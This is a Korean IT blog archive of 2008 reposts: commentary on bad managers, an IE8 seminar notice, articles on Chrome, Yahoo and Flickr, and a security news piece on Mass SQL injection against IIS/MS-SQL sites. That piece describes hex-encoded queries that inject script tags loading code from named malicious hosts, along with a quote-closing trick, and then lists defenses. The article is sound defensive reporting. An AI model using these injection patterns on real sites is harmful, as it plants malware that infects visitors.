|
|
ITWeb/스크랩 2008. 9. 10. 10:47
아 정말 이럼 안되겠죠.. 능력은 안되면서 학연/지연 등으로 중무장 하여 감히 범접 할 수 없는 매니저들.. 그냥 쉽게 별 생각 없이 위에서 던져진 과제에 대해서 한 치의 고민도 없이 툭 던지고.. 그래서 정리해서 문서를 던져 주면 다시 말 바꾸고.. 이런 무능력한 매니저들.. 어찌 해야 할까요.. 팀장을 바꿀수 없으면 팀을 옮기거나 아니면 맞추거나 이도 안되면 회사를 옮겨야 하는 상황도 생기겠죠.. 쿨럭 ㅡ.ㅡ; 암튼 중이 싫은 건지 절이 싫은 건지 잘 고민을 해봐야겠죠... ^^; 원본글 : http://bobbyryu.blogspot.com/2008/09/blog-post_09.html
기억상실증과 변덕이야말로 악한 매니저가 갖추어야 기본적인 조건입니다. 그들은 자신이 한 말조차 정말로 잊어 버립니다. 잊어버리기만 하는 것은 그래도 좋죠. 일이 줄어드니까요. ^^
그런데 갑자기 정반대의 지시를 합니다. 정상적인 사람이라면 말을 바꾼 이유에 대해 설명을 하고 조금은 미안한 마음이라도 가질 텐데, 그들은 기억을 못하니 설명을 안하고 미안해하지도 않습니다.
자신에게 불리한 것은 곧바로 잊어버리고, 상황 또는 윗사람의 한 마디에 즉시 말을 바꾸는 기술.
그러한 기술을 가진 그들은 어쩌면 오피스의 카멜레온. 그 결과 그들은 끈질긴 생존력을 자랑합니다.
매니저라는 사람이 의사 결정은 안해주고..
뭐든 팀원들에게 물어나 보고 어떻게 했으면 좋겠냐.. 도대체 자기의 주관은 어디다 버리고 온건지.. 정말 무개념..ㅡ.ㅡ^
책임을 지기 싫으면 팀장을 하지 말던가..
암튼.. 이런 매니저도 정말 지랄 맞다구요.. 그죠 ^^*
원본글 : http://bobbyryu.blogspot.com/2008/09/blog-post.html
판단 능력이 부족하고, 소심하며, 어떠한 리스크도 감수하지 않으려고 하며, 실제로 하는 일이 없기 때문에 실패하지도 않으며, 그 결과 끈질긴 생존력을 자랑합니다.
ITWeb/스크랩 2008. 9. 9. 21:22
http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032388109&Culture=ko-KR
역시 공짜 세미나 입니다.
이건 좀 관심을 가지고 들어 보셔도 좋을 듯 하내요.. ^^*
2008년 9월 17일 수요일 오후 1:00 - 2008년 9월 17일 수요일 오후 5:40
건국대학교 새천년관 대공연장
광진구 화양동 건국대학교 내
건국대학교 새천년관 대공연장
한국
143-701 서울 광진구 화양동 1번지
|
언어: |
한국어. |
|
제품: |
Microsoft Windows 및 Windows Vista. |
|
대상 고객: |
IT 전문가 및 개발자. |
|
Start |
End |
Session |
|
14:00 |
14:05 |
Key note |
|
14:05 |
14:50 |
Internet Explorer 8 의미와 가치 |
|
14:50 |
15:40 |
IE 8의 New Feature 소개 및 구축 사례 소개 |
|
15:40 |
16:00 |
Break (음료 제공) |
|
16:00 |
16:40 |
IE 8 개발 가이드 part 1 |
|
16:40 |
17:30 |
IE 8 개발 가이드 part 2 |
|
17:30 |
17:40 |
경품 추첨 |
ITWeb/스크랩 2008. 9. 8. 22:36
예전 부터 느낀거지만 오픈소스, 오픈API 등등 이렇게 구글이 모든지 오픈 하는 이유는 무엇일까? 를 생각해 봤던때가 있었다... 어디선가 컬럼으로도 봤던것 같기도 하다. 이런식으로 구글의 오픈 플랫폼과 API 들이 개발자들에게 종속성을 가지게 하고 모든 매쉬업 서비스등에 선점의 효과를 발휘 하게 된다면.. 어떤 효과가 나타 나락요.. . MS 가 과거 독점 어쩌고 저쩌고 말이 나올때.. 지금도 나오고는 있죠.. 하지만 요즘 봐서는 구글이 너무 독점적 지배를 하고 있지 않나 싶기도 하다. 개발자 중에서 구글을 싫어 하는 사람은 얼마나 될까??? 뭐.. 그건 중요 하지 않고.. 나는 싫어 하지 않으니까.. ㅋ 다만 국내 포털과 국외 포털의 지향하는 방향은 너무나 많이 다르다는 느낌에.. 좀.. ㅋ 난 뭐.. 내 앞가림이나 잘하자.. ^^* 원본글 : http://www.zdnet.co.kr/news/internet/browser/0,39031243,39172917,00.htm
웹벤처가 '구글크롬'을 주목해야할 5가지 이유
Bob Walsh(CNET News)=정리, 박효정 기자 2008/09/08  |
[지디넷코리아]이달초 등장한 구글의 새 웹브라우저 ‘크롬’은 구글이 갖는 명성과 빠른 속도를 무기로 웹브라우저 판도를 바꿀 것이란 평가를 받고 있다. 마이크로소프트(MS) 인터넷 익스플로러(IE)와 파이어폭스 그리고 크롬의 ‘삼각관계’를 다룬 기사도 우후죽순 쏟아졌다. 하지만 ‘크롬’이 신생 인터넷 기업에 어떤 의미가 있는지를 다룬 기사는 거의 없다. 이에 ‘크롬’이 앞으로도 계속 선전한다는 것을 전제로 신생 인터넷 기업에 미치는 영향을 5가지로 정리해봤다. 1. 크롬:현재 브라우저=윈도:도스‘크롬’은 현재 브라우저쪽에서 윈도가 도스(DOS)에 대해 갖는 의미를 갖고 있다. MS는 23년전 무질서한 운영체제(OS) 시장에 질서를 제공함으로써 단순한 SW업체에서 거대기업으로 변모하기 시작했다. 당시엔 PC로는 애플리케이션도 실행할 수 없었다. 기본적으로는 같은 것을 실행하지만 서로 다른 OS들이 다수 존재했고 애플리케이션을 개발할 때도 혼란이 있었다. 각각의 OS에 최적화시키는 것만으로는 충분치 못할 때도 있었다. OS 버전마다 애플리케이션을 맞춰야 하는 시절이었다. 구글은 수익성과 업계 영향력을 확대하기 위해 크롬을 웹 애플리케이션의 표준 OS로 만들려는 야심을 갖고 있다. 웹 애플리케이션과 정통 데스크톱 애플리케이션간 구별을 없애는 것도 목표로 내걸었다. 이것은 시작메뉴, 데스크톱에서 웹 애플리케이션을 돌릴 수 있다는 것을 의미한다. 요즘 웹애플리케이션에 있어 가장 큰 숙제는 오류에 의해 브라우저창이 갑자기 닫히는 것(크래시)이다. 구글은 크롬을 통해 여기에 종지부를 찍으려 하고 있다. 구글은 또 크롬을 플랫폼으로 사용하면 웹을 노리는 악성코드에 대한 불안이 해소되는 이점도 있다고 주장하고 있다. 2. 자바스크립트 재구축웹 애플리케이션의 또 다른 문제는 바로 자바스크립트다. 자바스크립트는 ‘에이잭스’(Ajax) 애플리케이션과 프로토타입, script.aculo.us, extjs과 같은 자바스크립트 라이브러리를 통해 영향력을 확대해 나가고 있다. 그러나 현재 브라우저에 들어간 ‘자바스크립트 인터프리터’는 내리막길을 걷고 있다. 과부하를 감당하지 못하고 있는 것이다. 이를 위해 구글은 새로운 자바스크립트 인터프리터인 ‘V8’을 구축했다. ‘V8’는 크롬에 들어가 있으며 구글 오픈소스 라이선스를 통해 제공되고 있다. 이것은 무엇을 의미하는가. 광고주가 주목하고 있는 온라인 동영상 분야 혁신에 유용할 가능성이 높다. 3. ‘구글 보안관’ 납시오!지금까지 얼마나 많이 허술한 자바스크립트 기능, 플러그인, 거대한 사진 때문에 브라우저가 정지됐는가. 구글은 크롬을 사용하면 악성코드가 샌드박스에서 잡히게 된다고 큰소리를 치고 있다. 오늘날 웹이 공격자들의 넘버원 타깃이 됐음을 감안하면 구글은 사이버 공간의 악인들과 싸우게 되는 셈이다. 경찰처럼 크롬은 눈 깜짝할 순간에 바이러스에 대응하는 SW업체 업무에 영향을 끼치게 될지도 모른다. 4. 크롬으로 통합되는 ‘오픈’ 소셜 네트워크구글은 크롬을 통해 ‘닫힌’ 소셜 네트워크에 최후통첩을 날렸다. 구글이 크롬을 확장해 인터넷 서핑 중 같은 사이트를 동시에 보고 있는 친구와 서로 연락하게 하려면 얼마나 걸릴까. 언젠가 구글이 자사 소셜네트워크 주도권(‘구글셰어’로부터 ‘오픈ID’ 지원 강화, ‘지메일’에서 사용할 수 있는 ‘구글토크’의 인스턴트메시징 기능 등 모든 것)을 정리하면 누구나 사용할 수 있는 통합된 크롬 지원 서비스를 제공할 수 있을 것이다. 5. 크롬의 확장 API크롬의 확장 API가 곧 등장한다. 준비하자. 파이어폭스의 거대한 확장 API ‘생태계’는 파이어폭스 확산에 크게 기여하고 있다. 현재 출시된 크롬 베타버전은 확장 API를 지원하지 않지만, 확장 API가 구글 계획에 포함되어 있는 것은 확실하다. 크롬을 낳은 오픈소스 프로젝트 홈페이지 ‘ 크로미엄(Chromium)’에서 눈을 떼지 말아야 할 또다른 이유다. @ |
ITWeb/스크랩 2008. 8. 12. 00:26
ㅎㅎ 일본에 관심 있는 분들은 좋겠내요.. ^^* 사실 저도 일본 애니에 관심이 많은데... 재팬야후 드가서 어케 검색을 해야 할쥐.. 고민을 많이 했었답니다. 앞에 펌글에도 있지만 야후는 기술력이 문제는 정말 아니라고 생각 되내요. 사실 야후가 구글 보다 뒤진다고 생각 하지도 않지만 떨어진 브랜드 파워는 정말 회복하는데 시간이 올래 걸리는것 같습니다. 그래도 더욱 분발 하시길... ^^* 야후 코리아에서 사용하는 형태소 분석기는 본사에서 만든 YWS 국민대에서 만든 KMA 라는 이 두가지를 사용 하고 있지요.. KMA 는 네이버에서도 사용중인데.. 지금도 쓰고 있는지는 잘 모르겠내요.. ㅎㅎ 국민대 강승식 교수 : 한글공학, 정보검색 연구소 : http://nlp.kookmin.ac.kr/이 lab 에서 만들고 있는 document classification 이라는게 있는데 이 분야는 야후 본사에 이미 존재를 하고 있답니다. 제가 이걸 가지고 스팸 문서 분류 하는걸 구글에 계신 강재호 과장님과 함께 진행을 했었는데.. ㅎㅎ 기억이 새록 새로.. 하내요.. :) ref. http://www.zdnet.co.kr/news/spotnews/internet/search/0,39040070,39171966,00.htm
[지디넷코리아]야후코리아는 단어를 자동으로 인식해 검색결과를 바로 보여주는 야후! 미니, 일어 사전 서비스(http://kr.dic.yahoo.com/search/jpn/)를 선보인다고 11일 밝혔다. 야후! 미니사전이란 인터넷 서핑이나 문서 작업 중 모르는 단어에 마우스를 갖다 대기만 해도 영어, 한자, 국어 등 사용자가 원하는 검색 결과를 미니 창에 바로 찾아주는 신개념 서비스다. 이번에 새롭게 추가된 야후! 일어 사전 역시, 별도로 타이핑 할 필요 없이 모르는 단어에 마우스로 더블 클릭하거나, 미니펜을 올려다 놓기만 해도 단어 검색이 가능하다. 반면, 현재 다른 포털사에서 제공 중인 일어 사전은 문자를 직접 그리거나, 일본어 입력기 등을 이용해 단어를 일일이 검색해야 한다. 특히, 야후 만의 형태소 분석기(Yahoo Word Segmentation)를 적용해 우리 나라와는 달리 띄어쓰기를 사용하지 않는 일본어 문장을 형태소 별로 인식해 보다 정확한 검색 결과를 제공함은 물론, 단어의 기본형을 찾아 검색해 주는 것이 특징. 예를 들어 미니사전이 문서에서 ‘하셨습니다’ 혹은 ‘하셨다’ 단어를 인식했을 경우, 형태소 분석을 근간으로 단어의 원형인 ‘하시다’와 관련된 뜻과 예문을 제공하는 방식이다. 야후코리아 검색팀 김봉균 부문장은 “일본어는 문자의 복합성과 한자를 혼용해서 쓰기 때문에 매번 검색창에 단어를 입력하기가 어려운 것이 사실” 이라며, “더욱 편리해진 야후! 일어 사전을 통해 초보 일본어 사용자들도 보다 쉽게 일본어를 접하고 학습할 수 있을 것으로 기대된다”라고 말했다. |
ITWeb/스크랩 2008. 8. 11. 09:47
아래 글에서 크게 와닿는 부분이 두군데 있내요.. 1. 야후 문제는 기술이 아니라 브랜드파워 2. 경영진이 분기 실적을 너무 중시 이건 야후 본사만의 문제는 아니라고 보여 지는군요. ref. http://www.zdnet.co.kr/news/internet/etc/0,39031281,39171943,00.htm
플리커 설립자 “야후 문제는 기술이 아니라 브랜드파워”
Alex Serpo(CNET News)=정리, 박효정 기자 2008/08/10 |
[지디넷코리아]지난 2003년, 온라인 게임 벤처회사 ‘게임네버엔딩(Game Never Ending)’의 스튜어트 버터필드 사장은 자금이 떨어지자 그동안 개발해온 기술을 응용해 사진공유 사이트 ‘플리커’를 시작했다.
 |
| ◇사진설명: 스튜어트 버터필드 플리커 설립자. | 야후가 회사를 인수한 뒤 3년을 포함해 5년간 플리커와 함께 한 버터필드는 최근 야후를 떠나 원점으로 돌아왔다(야후에 있으면 수백만달러의 돈을 손에 넣을 수 있었을 것이다). 각종 아이디어를 구상하며 휴식을 즐기고 있는 그에게 웹, 구글, 마이크로소프트, 야후의 플리커 인수 등에 대한 생각을 들었다. 지금 웹에서 가장 재미있는 것은 무엇이라고 생각하나. 주목받아야 마땅한데, 실제로는 별로 주목을 받지 못하고 있는 프로젝트에 ‘플리커 공중(Commons) 프로젝트’가 있다. 스미소니언 협회, 미 의회도서관, 프랑스 툴루즈미술관과 영국과 뉴욕의 큰 미술관 등 5개 조직이 참여하고 있다. 모두 공공 도메인의 사진 아카이브(archive)를 인터넷에서 공개하고 있다. 이 사진들은 모든 사람들의 것이지만, 워싱턴 DC, 툴루즈, 런던 등 보관 장소에 직접 가지 않으면 볼 수가 없다. 하지만 매우 웹2.0적 방법으로 플리커를 사용해 테마에 관한 지식이 있는 사람들이 설명을 더함으로써 지식을 전달하게 되는 것이다. 스스로 회사를 운영한 것과 비교해서 야후의 조직 아래에서 일하는 것은 어떤 차이가 있나. 확실히 직접 회사를 경영하는 것보다 힘들었다. 그러나 사실은 많은 자유가 주어졌다. 문제가 일어난 건 처음 2년간이었다. 당시 우리는 프로젝트 진행을 위해 필요한 자원 확보와 관련한 많은 문제를 떠안고 있었다. 우리는 성공을 거두는 것과 동시에 완전한 자주성을 유지해 왔다. 설립 당초, 플리커처럼 급상승한 기업을 어떻게 경영하고 있었나. 경영은 정말 힘들었다. 플리커를 시작한 아이디어는 지난 2003년초 ‘게임네버엔딩’에서 태어난 것이다. 2002년에 우리는 게임제작사를 설립해 프로토타입을 만들어 수천명에게 테스트를 받았다. 하지만 2003년에 문제가 발생했다. 당시는 특히 개인용 인터넷 서비스에 대한 투자가 어려운 시기였다. 아무도 투자하고 싶어하지 않았다. 자금이 바닥났고 급여가 지급된 것은 아이가 있는 사원 1명뿐이었다. 게임을 완성시킬 전망은 없어 보였다. 우리는 지금까지의 성과를 다른 것에 응용할 것을 결정했다. 플리커의 아이디어가 번쩍인 것은 내가 뉴욕에서 식중독에 걸렸을 때였다. 현재 플리커와는 달리, 초창기 플리커의 상태는 끔찍한 수준이었다. 기술적으로는 매우 멋지고 혁신적이었지만 제품으로서는 가치가 없었다. 자신이 걱정하고 있는 사람과 자신이 동시에 인터넷에 접속하고 있는 확률이 거의 없다는 것 때문이었는데, 이것은 매우 중요한 문제였다. 더구나 MSN 메신저, AOL 등의 메신저 서비스가 이미 있었다. 그러나 플리커는 기술적으로는 훌륭하고 충분한 관심을 모을 수 있었다. 플리커의 시작은 2003년 12월에 결정해 2004년 2월에 착수했다. 그후 2004년 5~6월에 현재와 같은 수준으로 진화했다. 플리커를 시작하고 나서 약 1년 뒤인 2005년초 야후와의 인수 계약이 체결되었다. 교섭에 11개월이나 걸렸다. 당시 성장률은 하루에 1% 정도였다. 때로는 점심 전에 1%에 이르기도 했다. 1%라는 숫자가 그다지 크게 보이지 않지만 누적하면 대단한 것이다. 한달에 2배 성장한 적도 많았다. 끊임없이 코드를 고쳐쓰고 신규 서버를 추가했다. 새로운 사람들이 합류했나. 널리 알려진 것처럼 우리는 꽤 작은 팀이었다. 인수 당시 팀의 총인원수는 고객 서비스 담당 계약직원 1명을 포함해 11명이었다. 그중 9명이 인수 후에도 팀에 남았다. 인수 계약 체결 당시 회원수는 약 40만명이었다. 현재는 2,800~2,900만명 정도의 회원이 있는 것으로 안다. 현재는 한달간 순방문객수는 약 5,000만에 달한다. 약 50~100배로 성장한 것이다. 인수 후 야후는 어땠나. 야후에는 장점과 단점이 있었다. 인수 전보다 훨씬 많은 자원을 얻은 면도 있고 그 반대 면도 있다. 우리의 예산 편성은 내 상사의 상사보다 커졌다. 반면 나에게는 언제 직원을 고용할지를 판단할 권한이 없었다. 분기 실적을 위해 그 분기가 끝나기 전에 고용을 중지해야 했다. 고용 중단은 두달 정도 계속됐지만, 그 사이 플리커 규모는 3배가 됐다. 마이크로소프트와 야후의 ‘로맨스’에 대해서는 어떻게 생각하나. 별로 좋지 않았다고 생각한다. 분명히 미묘한 관계였다. 나는 일단 교섭이 시작된 이상 (인수가) 성공하는 편이 좋다고 생각했다. 분명히 주가뿐 아니라, 기업의 도덕성이나 리더십 등의 면에서 야후는 커다란 상처를 입었다. 그러나 이것은 총만 믿고 살다가 총 때문에 죽는 것과 같은 경우라고 생각한다. 나는 야후의 최대 문제는 경영진이 분기 실적을 너무 중시한 것이라고 생각한다. 그것은 전략이 아니다. 물론 주가로 무엇인가를 실현할 수 있도록 주가를 안정시키기 위해 분기 실적에 어떤 수치를 결과물로 내놔야 하는 상황에서는 전술이 될 수도 있을 것이다. 확실히 구글의 경영진은 공식적 발언과 달리 숫자를 고집하고 있지만 그들은 동시에 보다 큰 전술적 위험을 지고 있다. 수많은 인터넷 신생기업들도 마찬가지다. 그것이 구글이 검색시장에서 톱을 차지하는 이유라고 생각하나.솔직히 말해 구글이나 다른 사이트나 검색기술에서 커다란 차이는 없다고 본다. 하지만 ‘브랜드’를 말하면 얘기가 달라진다. 야후는 브랜드 파워가 거의 죽은 상태다. 야후가 전달하는 정보량의 이야기가 아니다. 물론 야후는 대만이나 일본에서는 잘나가고 있고, 중국에서도 꽤 큰 힘을 자랑하고 있다. 최근 검색엔진의 이름을 숨기고 검색결과를 사람들에게 평가하게 한 재미있는 연구가 있었다. 실험대상자들에게 MS, 야후, 구글 검색결과를 서로 섞어 보여준 것이다. 정확한 숫자는 기억나지 않지만, 80% 이상이 브랜드를 검색결과의 정확성 판단 기준으로 삼고 있었다. 즉 야후의 검색결과를 구글 검색결과라고 알려주면 사람들은 “구글이니까 정확하겠지”라며 높이 평가하는 경향이 있다는 것이다. 당신이 야후를 떠난 이유는 무엇인가. 내가 퇴사한 것은 MS의 (야후) 인수건 때문이 아니다. 원래 3년 계약이었고, 3년 조금 넘게 있었기 때문에 오히려 계약보다 오래 있었다. 야후에 있던 3년간이나 그 전의 3년도 기본적으로 같은 일에 종사했다. 나로서는 매우 긴 시간이었고 쉬지 않고 일을 한 최장기록이었다. 그래서 휴가를 내고 여행하기로 결정한 것이다. 그렇다면 단순한 변화일 뿐, 큰 프로젝트는 진행되고 있지 않다는 것인가. 그렇다. 다양한 프로젝트를 생각하고 있는 중이다. 현재는 어떤 아이디어라도 자금을 조달할 수 있는 상황이라 다행이다. 물론 ‘브랜드’ 문제는 여전하다. 그러나 사람들이 아이디어가 아닌 사람에게 투자하는 데는 이유가 있다. 아이디어는 변하기 쉽기 때문이다. 게임에서 시작한 플리커의 변화가 그렇고, 플리커 자체도 다양한 변경을 거쳐왔다. 현재 플리커와 초기 플리커는 공통점이 거의 없다. 초기 플리커에는 태그가 없었고, 웹페이지로 개개의 사진을 볼 수 도 없었다. 또 소셜 네트워크 기능은 있었지만 구조는 완전히 달랐다. ‘친구’와 ‘가족’이라는 컨셉도 없었다. @ |
ITWeb/스크랩 2008. 7. 29. 13:57
음냐.. 무단전개 및 재배포 금지 라는데.. 이러다 잡혀 가는건 아닌지 모르겠내.. ㅡ.ㅡ; (보안 뉴스 관계자님.. 나쁜 목적으로 개재 하는거 아닙니다.. 용서해 주세요.. ^^;) 아래 글은.. 읽어 보면.. IIS 에서 발생 하는 sql injection 에 대한 부분이다. 뭐.. 최소한의 input validation 만 거쳤어도.. 이런것들은.. 충분히 막을 수 있을텐데.. client side 에서 한번 거르고.. server side 에서 또 한번 거르고.. 보안을 강화 하게 되면 사용성이나 퍼포먼스에 영향을 줄수 있겠지만.. 한번 뚤리면.. 그 악효과는.. 뭐.. 말하지 않아도.. 잘.. ^^* 암튼.. 장단점을 잘 활용하여.. 개발 합시다.. ㅎㅎ ref. http://www.boannews.com/media/view.asp?idx=10729&kind=&sub_kind= | 최신 해킹 공격 동향 |
| [입력날짜: 2008-07-25] |
|
 |
|
|
Web Security Solution All Guide
Chapter 3. 웹 보안 전문가 노하우 훔쳐보기
적절한 보안대책 마련해야
2008
년 4월 초부터 전 세계 130만개 이상의 웹 사이트에 악성코드를 유포하는 SQL-Injection공격 코드가 숨어있는 것이
밝혀져 최근 가장 큰 이슈가 되고 있다. 하지만 언론으로부터 알려진 것은 4월이지만 보안전문가들 사이에서 이슈가 된 것은
2008년 1월 초부터이다. 처음 알려진 것은 아파치 보안 모듈인 Mod Security 프로젝트의 블로그에 공개되면서부터인데
우리나라의 많은 사이트들이 지금 현재도 공격을 받고 있는 중이다.
공
격 기법의 명칭은 Mass SQL-Injection이라 불리우며 기존의 SQL-Injection 기법보다 확장된 개념이다. 크게
2가지 방식으로 공격이 되며 공격 쿼리의 일부분을 HEX인코딩하거나 전체 쿼리를 HEX 인코딩하여 보안장비와 필터링 설정을
우회하는 기법이다.
Mass
라는 단어의 사전적인 의미는 대량의, 집단이라는 뜻을 가지고 있다. 즉, 한 번의 공격으로 대량의 DB값이 변조가 되어 해당 웹
사이트에 치명적인 악영향을 준다. DB값 변조 시 악성 스크립트를 삽입하여 이용자들이 감염되거나 봇이 설치되어 DDoS공격에
좀비컴퓨터로 이용이 가능해진다.
이
러한 Mass SQL-Injection은 IIS 환경의 MS-SQL을 사용 중인 ASP 기반 웹 애플리케이션에만 발생하며
언론에서 몇 차례 피해 사실을 보도하기도 했다. 피해를 당한 IIS의 로그를 보면 다음과 같은 로그가 기록되어 있다.
공격 코드의 중간 중간 00을 제거하고 ASCII 코드로 디코딩을 해보면 ;
다
음과 같은 SQL 쿼리가 나타난다. 이 구문은 테이블에서 테이블의 SQL sysobject type U(User) 모든 row를
가져오는 것이다. 모든 컬럼을 varcher(8000)으로 형식을 바꾸고 커서를 활용하여 각 오브젝트에
http://bannerupd.com/b.js 사이트 주소 코드를 추가하도록 업데이트 명령을 실행 시키는 일반적인 구문이다.
일반적인 구문에서 현재는 약간 변형된 형태의 공격쿼리 삽입시도도 이루어지고 있다.
스크립트 삽입 부분에서 일반적인 삽입형태와 달라진 부분은 "></tile>이 추가 된다.
기
존 <스크립트 ....></스크립트>와 다른 점은 ">추가 만으로 <input
name="test" value=" ">과 같은 곳에 test의 값으로 삽입 될때 기존 스크립트는 단지value 값으로
스크립트가 실행이 되지 않지만 ">의 추가로 value 값이 정상적으로 닫히고 스크립트가 삽입되게 된다.
물
론 그 밖의 경우에도 "></title>부분은 무시되고 스크립트가 삽입되게 된다. 단순히 js 파일명을
바꿔가면서 웹셀 업로드 하는 것과는 다르게 모든 삽입되는 곳에서 스크립트가 실행 가능하도록 하게 만든 패턴이다. DB 테이블
중에서 TEXT 형태로 된 컬럼을 찾아서 <스크립트
src=http://s.see9.us/s.js></스크립트>를 추가한다. varchar 형태의 컬럼에는
<스크립트 src=http://s.see9.s.js></스크립트>이 추가되며 문제는 모든 테이블의 컬럼에
적용이 된다는 것이다.
이에 해당하는 공격을 사전에 방지하기 위해서는 아래와 같은 대책이 필요하다.
1.
디클리어 구문을 이용한 공격을 차단하기 위해서는 웹 소스상에서 쿼리스트링에 대한 길이제한 적용을 해야 한다. 대부분 소스 작성시
쿼리스트링 값의 제한을 적용하지 않는 경우가 많음. 따라서 웹 개발자와 상의하여 쿼리스트링 길이 값에 대한 제한을 적용 권고
2. SQL-Injection 취약점이 있으면 중·장기 대책으로 이에 대한 소스코드에 수정 권고
3. 입력되는 부분의 문자를 모두 제한하여 예상되는 문자 이외의 문자가 들어오면 필터링하는 방법으로 수정 필요
4. 정기적인 DB 및 시스템 백업 필요
또
한 디클리어 구문을 이용한 공격을 차단하기 위해서는 웹 소스상에서 쿼리스트링에 대한 길이 제한 적용을 해야 한다. 대부분 소스
작성시 쿼리스트링 값의 제한을 적용하지 않는 경우가 많다. 따라서 웹 개발자와 상의하여 쿼리스트링 길이 값에 대한 제한을
적용해야 한다.
<글· 박종성 NSHC 연구원(jspark@nshc.net)>
[정보보호21c (info@boannews.com)]
<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지> | |
ITWeb/스크랩 2008. 7. 29. 13:51
개발자 입장에서 보안은 참 중요한것 같다. 하지만 이런 보안에 대한 경험이 뒷받침 되지 않고서는 보안을 유지 하기가 쉽지 않다. 당연한 말이지만.. 방어 하는 자와 공격 하는자.. 과연 누가 이길까??? 제일 아래 10가지 고려사항에 대해서 고민을 해보고 그에 적절한 개발을 하는것 역시 중요 하다. 무조건 장비만 도입 한다고 해서 모든게 해결 되지는 않을 테니.. 몇몇 개발자 분들의 코드를 확인해 봤는데.. xss 와 sql injection 에 정말 대책 없이 개발 되어 있는걸 봤다.. 열심히 설명은.. 해보겠으나.. 받아 들일 준비들이 안된듯.. 음냐.. 모르면.. 배웁시다.. 고집 피우지 말고... ^^* ref. http://www.boannews.com/know_how/view.asp?idx=2161&search=title&find=%B5%BF%C7%E2
Web Security Solution All Guide
Chapter 1. 웹 보안의 개념과 이해
Frost&
Sullivan의 보고서는 이미 2004년 웹 애플리케이션 보안 시장이 전년대비 성장률 66.5%를 시작으로 매년 전년대비
50% 이상 급속도로 성장할 것으로 전망했다. 또한 웹에 대한 시장요구 사항이 변화됨에 따라 이를 반영하여 보안 영역을
구분했다.
예
를 들어 미국의 체크포인트사의 경우 네트워크 보안과 웹 보안, 내부 보안으로 영역을 구분하고 이 가운데 웹 보안이 가장 급속도로
성장할 것으로 예측했으며 관련 제품의 라인업을 갖추려고 노력하고 있다. 이 와는 별도로 웹을 포함한 메신저, 메일 등을 포함하는
애플리케이션 보안 분야에 중점을 두고 향후 이 시장이 급속히 성장할 것으로 예측하고 있다.
양
키그룹(Yankee Group)은 ‘Application Gateways Secure Business
Communications’라는 보고서에서 이들 애플리케이션 보안을 전담하는 게이트웨이 시장을 분석하고 향후 20억 달러 이상의
시장을 형성할 것으로 예상했다. 각각의 기관이 조사한 자료에 따라 수치가 차이가 나긴 하지만 웹 애플리케이션 보안에 대한 수요의
폭발적 증가와 관련 시장의 성장을 동일하게 나타내고 있다.
특
히 기업이나 공공기관 애플리케이션 전산 환경이 하루가 다르게 웹 기반으로 바뀌고 있다. 언제 어디서나 내부망에 접속할 수 있으며
대 국민이나 고객대응에 대한 다양한 정보를 손쉽게 공유할 수 있다는 편리함이 그 이유이기 때문이다. 그러나 이러한 환경은 웹
특성상 서비스를 위해 80포트(HTTP)나 443포트 같은(HTTPS)같은 통로를 열어놔야 하는 구조상 근본적인 취약점을 안고
있다. 이에 따라 이곳을 통해 웹 프로그램의 설정 오류나 개발 오류로 인한 웹 애플리케이션 자체의 취약점을 이용한 홈 페이지와
웹 서버 해킹이 시도될 수 있다. 이러한 서비스 포트를 통한 침입 공격의 유형의 85% 이상이 웹 애플리케이션 서비스 포트를
통한 공격이다.
실
제로 웹 고객 정보를 빼돌리거나 콘텐츠 변조, 서비스거부공격(DoS), 홈페이지 위·변조, 내부 중요 시스템의 침입 등 해킹
사고가 최근 들어 눈에 띄게 늘고 있다. 업계 자료에 따르면 국내에서 발생된 해킹 시도의 70% 가량이 웹 애플리케이션의
취약점을 이용한 것으로 추정되고 있다.
웹
애플리케이션을 통한 보안 사고는 PHP 취약점 및 제로보드·그누보드·코웹로그 등 웹 게시판 프로그램의 취약점을 이용한 해커그룹이
홈페이지를 무차별 변조하면서 발생한 현상으로 전 세계적으로 ‘주의경보’ 발령과 더불어 즉각적인 수정 및 패치 업그레이드를
권장하고 있다.
당
시 구글 등 인터넷 검색엔진을 이용해 관련 취약점이 패치되지 않은 웹 서버들을 찾아 해킹 한 것으로 판단되며 단시일 내에
700여개 홈페이지가 변조되었고 이중 450개는 한 해커그룹에 의해 이뤄지기도 했다. 이는 하나의 취약성으로 인해 얼마나 많은
시스템이 피해를 입을 수 있는지를 보여준 사건이었다.
이
와 같은 사건에 대한 웹 보안 강화 방법으로 제일 먼저 고려할 수 있는 것은 개발자의 웹 프로그래밍 시 코드상의 오류를
근본적으로 고치는 것이다. 하지만 대부분의 웹 애플리케이션 프로젝트에서는 서비스의 편의성 및 기능 구현을 중요시하는 풍조,
프로젝트 오픈 완료 일정에 따른 소스 보안검증의 부실함으로 인해, 개발자 스스로도 취약성을 인지하면서도 보안성 강호를 무시하여
많은 취약성을 가진 웹 애플리케이션이 구축되는 경우가 많다.
그
러나 시스템 오픈 후 취약성이 존재하는 소스를 일일이 찾아내어 고친다는 것은 많은 시간과 비용을 필요로 하며 보안성 강화를 통한
프로세스의 변경 및 재개발, 성능 저하에 대한 우려를 이유로 대부분의 웹 사이트가 사고 발생 전까지 무방비 상태로 놓이게 되며
큰 사고로 연결되기도 한다. 초기 보안시스템의 이슈는 방화벽으로부터 시작해 침입탐지시스템(IDS) 또는 침입방지시스템(IPS)을
웹 서버의 앞 단에 구축해 불법적인 침입을 막는 역할을 했다.
이
러한 보안 시스템은 1세대 또는 2세대 보안시스템으로서 불특정한 침입자에 대한 보안을 하기 위한 것으로 네트워크 레벨에서
사용하지 않거나 인증되지 않은 포트를 차단하고 패킷에 대한 필터링을 통해서 비정상적인 침입자를 차단하기 위한 기능이 주였다.
그
러나 여기에는 커다란 문제가 존재한다. 웹의 특성상 방화벽을 설치하더라도 사용되는 서비스 포트는 항상 개방해야 하기 때문에 웹
서비스 포트를 통한 공격에 대해서는 무방비 상태로 노출된다는 것이다. 최근 지원영역을 애플리케이션 단까지 확장한 DPI(Deep
Packet Inspection) 방화벽이나 IPS가 출시되고 있으나 네트워크 레벨 기반의 보안 시스템에서 애플리케이션 레벨의
방어를 하는 데는 한계를 갖고 있을 수 밖에 없다. 이들은 주로 시그니처에 의존한 패턴 매칭기술을 기반으로 애플리케이션 영역의
‘이미 알려진’ 공격만을 차단하기 때문에 패턴데이터에 저장되지 않은 웹 애플리케이션 공격을 탐지하거나 기업에서 자체적으로 개발한
웹 애플리케이션의 취약점을 이용한 시그니처를 제공하지 못하는 한계가 있다.
CC인증 획득이 시장 선점의 열쇠
현
